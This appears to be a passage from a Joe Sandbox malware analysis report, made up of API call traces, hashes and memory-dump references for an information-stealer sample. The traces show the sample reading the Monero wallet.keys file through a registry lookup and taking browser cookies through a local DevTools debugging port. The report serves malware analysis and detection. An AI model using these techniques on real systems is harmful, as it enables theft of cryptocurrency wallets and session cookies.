                                                              • Instruction Fuzzy Hash: 2F011D75A41305AFD7109BA4DC55FAFB779EB44700F104559FA04AB380DBB09A00CBE5
                                                              APIs
                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
                                                              • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                              • String ID:
                                                              • API String ID: 4291131564-0
                                                              • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                              • Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
                                                              • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                              • Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4
                                                              APIs
                                                              • CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0248CE6D
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0248CEAD
                                                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 0248CF30
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 1940255200-0
                                                              • Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                              • Instruction ID: 0a4190df63ec576170daaf79269db817d0bda6086746edc0c3bbc175a5d66644
                                                              • Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                              • Instruction Fuzzy Hash: DA315271A50615BFD714DB98CC81FAAB7B9AB88B14F504185FB04EB2D0D7B0AE45CBE0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2452939696-0
                                                              • Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
                                                              • Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
                                                              • Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
                                                              • Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                              • Instruction ID: c7232b8e9cdfa3d41438ff15828bec6d487674160e80e9d5a12c07380a3d7c53
                                                              • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                              • Instruction Fuzzy Hash: D771C3B1421A04BBDFE33B32DD05B4AFEA37F04721F10491E919A22DB49E226965DF51
                                                              APIs
                                                              • memset.MSVCRT ref: 0040108A
                                                                • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                                • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                                • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                                • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                                • Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                              • lstrcatA.KERNEL32(?,00000000), ref: 004010A0
                                                              • lstrlenA.KERNEL32(?), ref: 004010AD
                                                              • lstrcatA.KERNEL32(?,.keys), ref: 004010C8
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
                                                              • lstrlenA.KERNEL32(00A0BD68), ref: 0040110D
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00401131
                                                              • lstrcatA.KERNEL32(00000000,00A0BD68), ref: 00401139
                                                              • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
                                                              • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
                                                              • lstrlenA.KERNEL32(00A0E410), ref: 004011EE
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00401215
                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0040121D
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
                                                              • lstrcatA.KERNEL32(00000000), ref: 00401265
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 004012E1
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0040131D
                                                                • Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                              • DeleteFileA.KERNEL32(?), ref: 00401351
                                                              • memset.MSVCRT ref: 0040136E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                                              • String ID: .keys$\Monero\wallet.keys
                                                              • API String ID: 2734118222-3586502688
                                                              • Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                              • Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
                                                              • Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                              • Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02485E7C
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02485EAB
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02485EDC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02485F04
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02485F0F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02485F37
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02485F6F
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02485F7A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02485F9F
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02485FD5
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02485FFD
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02486008
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248602F
                                                              • lstrlen.KERNEL32(00431D64), ref: 02486041
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02486060
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248606C
                                                              • lstrlen.KERNEL32(00638DD8), ref: 0248607B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248609E
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 024860A9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024860D3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024860FF
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02486106
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248615E
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024861CD
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024861FF
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02486242
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248626E
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024862A6
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02486318
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248633C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                                              • String ID:
                                                              • API String ID: 2428362635-0
                                                              • Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                              • Instruction ID: ce062f6bf0bd3dac748c7aeca36e2638ae71ca71f2d177bbe6b9f64de8ce7d84
                                                              • Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                              • Instruction Fuzzy Hash: 2A029A70A112559BDB21FF79CC88AAFBBFAAF44308F05452AE855A7350CB74D941CFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02486B3C
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02486B77
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02486BA1
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02486BD8
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02486BFD
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02486C05
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02486C2E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$FolderPathlstrcat
                                                              • String ID:
                                                              • API String ID: 2938889746-0
                                                              • Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
                                                              • Instruction ID: fa2d27cc20cd83dd17b8cc950bf5a4e0071d884619b521b21416d02bcc10dac3
                                                              • Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
                                                              • Instruction Fuzzy Hash: 70F17D70A102569BDB61FF79CC48AAF7BFAAF44308F05842AE85597351DB78D901CFA0
                                                              APIs
                                                                • Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                                • Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                                • Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
                                                                • Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155
                                                              • strlen.MSVCRT ref: 00409311
                                                              • strlen.MSVCRT ref: 0040932A
                                                                • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                                • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                                • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                                • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                              • memset.MSVCRT ref: 00409371
                                                              • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
                                                              • lstrcatA.KERNEL32(?,00000000), ref: 004093A2
                                                              • strlen.MSVCRT ref: 004093C9
                                                              • strlen.MSVCRT ref: 00409416
                                                              • memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
                                                              • memset.MSVCRT ref: 00409562
                                                              • lstrcatA.KERNEL32(?,cookies), ref: 00409577
                                                              • lstrcatA.KERNEL32(?,00431D64), ref: 00409589
                                                              • lstrcatA.KERNEL32(?,?), ref: 0040959A
                                                              • lstrcatA.KERNEL32(?,00435160), ref: 004095AC
                                                              • lstrcatA.KERNEL32(?,?), ref: 004095BD
                                                              • lstrcatA.KERNEL32(?,.txt), ref: 004095CF
                                                              • lstrlenA.KERNEL32(?), ref: 004095E6
                                                              • lstrlenA.KERNEL32(?), ref: 0040960B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00409644
                                                              • memset.MSVCRT ref: 0040968C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                              • API String ID: 2819545660-3542011879
                                                              • Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                              • Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
                                                              • Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                              • Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98
                                                              APIs
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02496680
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02496699
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024966B1
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024966C9
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024966E2
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024966FA
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02496712
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0249672B
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02496743
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0249675B
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02496774
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0249678C
                                                                • Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024967A4
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02491E76
                                                              • GetUserDefaultLangID.KERNEL32 ref: 02491E7C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$DefaultLangUserlstrcpy
                                                              • String ID:
                                                              • API String ID: 4154271814-0
                                                              • Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                              • Instruction ID: 2c9f2182b65459bd832c6997db93203ca64bbffcada574a780c7b74738127076
                                                              • Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                              • Instruction Fuzzy Hash: 3E615F31500216AFDF21AF75DC88FAF7ABBAF45749F04502AF90A97264DBB49801DF60
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                              • lstrlenA.KERNEL32(009E6588,00000000,00000000,?,?,00421B61), ref: 00421840
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                              • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                              • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                              • lstrlenA.KERNEL32(009E65A8,?,?,00421B61), ref: 00421925
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
                                                              • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
                                                              • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
                                                              • lstrlenA.KERNEL32(009E65B8,?,?,00421B61), ref: 00421A0A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
                                                              • lstrlenA.KERNEL32(009E65D8,?,?,00421B61), ref: 00421A81
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcatlstrlen
                                                              • String ID:
                                                              • API String ID: 1049500425-0
                                                              • Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                              • Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
                                                              • Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                              • Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4
                                                              APIs
                                                              • memset.MSVCRT ref: 024712F1
                                                                • Part of subcall function 02471267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0247127C
                                                                • Part of subcall function 02471267: RtlAllocateHeap.NTDLL(00000000), ref: 02471283
                                                                • Part of subcall function 02471267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024712A0
                                                                • Part of subcall function 02471267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024712BA
                                                                • Part of subcall function 02471267: RegCloseKey.ADVAPI32(?), ref: 024712C4
                                                              • lstrcat.KERNEL32(?,00000000), ref: 02471307
                                                              • lstrlen.KERNEL32(?), ref: 02471314
                                                              • lstrcat.KERNEL32(?,00431D48), ref: 0247132F
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471366
                                                              • lstrlen.KERNEL32(006389F0), ref: 02471374
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471398
                                                              • lstrcat.KERNEL32(00000000,006389F0), ref: 024713A0
                                                              • lstrlen.KERNEL32(00431D50), ref: 024713AB
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024713CF
                                                              • lstrcat.KERNEL32(00000000,00431D50), ref: 024713DB
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471401
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471446
                                                              • lstrlen.KERNEL32(00638CA4), ref: 02471455
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247147C
                                                              • lstrcat.KERNEL32(00000000,?), ref: 02471484
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024714BF
                                                              • lstrcat.KERNEL32(00000000), ref: 024714CC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024714F3
                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0247151C
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471548
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471584
                                                                • Part of subcall function 0248F197: lstrcpy.KERNEL32(00000000,?), ref: 0248F1C9
                                                              • DeleteFileA.KERNEL32(?), ref: 024715B8
                                                              • memset.MSVCRT ref: 024715D5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
                                                              • String ID:
                                                              • API String ID: 1397529057-0
                                                              • Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                              • Instruction ID: 5f0fac2347c9ee578c6a2f870846ab4a8879030f6c854fc2f70893a51e3ff712
                                                              • Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                              • Instruction Fuzzy Hash: 51A17171A00255ABDB21EFB5CC88EDE7BBAAF44304F04442AE969A7250DB74D905DFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32 ref: 0248AE96
                                                              • lstrlen.KERNEL32(00638DD4), ref: 0248AEAC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248AED4
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248AEDF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248AF08
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248AF4B
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248AF55
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248AF7E
                                                              • lstrlen.KERNEL32(0043509C), ref: 0248AF98
